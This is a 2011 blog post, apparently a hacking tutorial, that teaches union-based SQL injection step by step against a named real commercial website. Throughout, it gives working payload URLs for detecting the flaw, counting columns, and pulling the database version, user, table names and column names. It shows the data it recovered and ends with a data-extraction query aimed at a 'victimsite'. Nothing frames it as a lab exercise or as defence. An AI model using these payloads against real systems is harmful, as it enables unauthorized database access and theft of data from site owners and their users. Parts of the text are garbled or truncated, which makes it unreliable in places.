Wednesday, 12 October 2011

SQL INJECTION


SQL INJECTION









SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web applicati

Example:http://www.hypetrading.com/productinfo.php?id=285
How to find a vulnerable site.....?





instead of this
http://www.hypetrading.com/productinfo.php?id=285Finding Number of columns:' (put the ' at end)


the site is no change or display another page then it is not vulnerable...


If the site get an error like this


 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND gepubliceerd='ja'' at line 1

then it is vulnerable... 

Finding number of columns
For that replace the single quotes" ' " with "order by n"
if it is not working
then try
 order by n--
http://www.hypetrading.com/productinfo.php?id=285 order by 1--(no error)

http://www.hypetrading.com/productinfo.php?id=285 order by 2--(no error)

http://www.hypetrading.com/productinfo.php?id=285 order by 3--(no error)


http://www.hypetrading.com/productinfo.php?id=285 order by 9-- (no error)

http://www.hypetrading.com/productinfo.php?id=285 order by 10--(error)
error like this
Unknown column '10' in 'order clause'
then the column is n-1 that is 9

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this












It showing 4,3. Let's take the Number 3.(take any number in this)

Now replace the 3 from the query with "version()"

http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,version(),4,5,6,7,8,9--

then it give
5.1.45




Replace the version() with database() and user() for finding the database,user respectively.

database
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,database(),4,5,6,7,8,9--

result:-  flashin_sparkms

user
http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,user(),4,5,6,7,8,9--  

result:- flashin_sparkms@localhost


Finding table name

http://www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--

Result like:-
artcats,headlines,hoofdstukken,nieuwsbrief,proafbeeldingen,procats,producten,
productenprijzen,talen,users,voorraden 4





find the column   name
Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--



-

(in the dialog box enter table name in this case is "artcats")



this is find by hackbar add-ones in Mozilla 
 for add-ones
https://addons.mozilla.org/en-US/firefox/addon/3899


www.hypetrading.com/productinfo.php?id=285 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 FROM information_schema.columns WHERE table_name=CHAR(97, 114, 116, 99, 97, 116, 115)-

Now find the  infermation
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(artcats_id,0x3a,artcata_tall),4,5,6,7 from artcats--
































































































Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)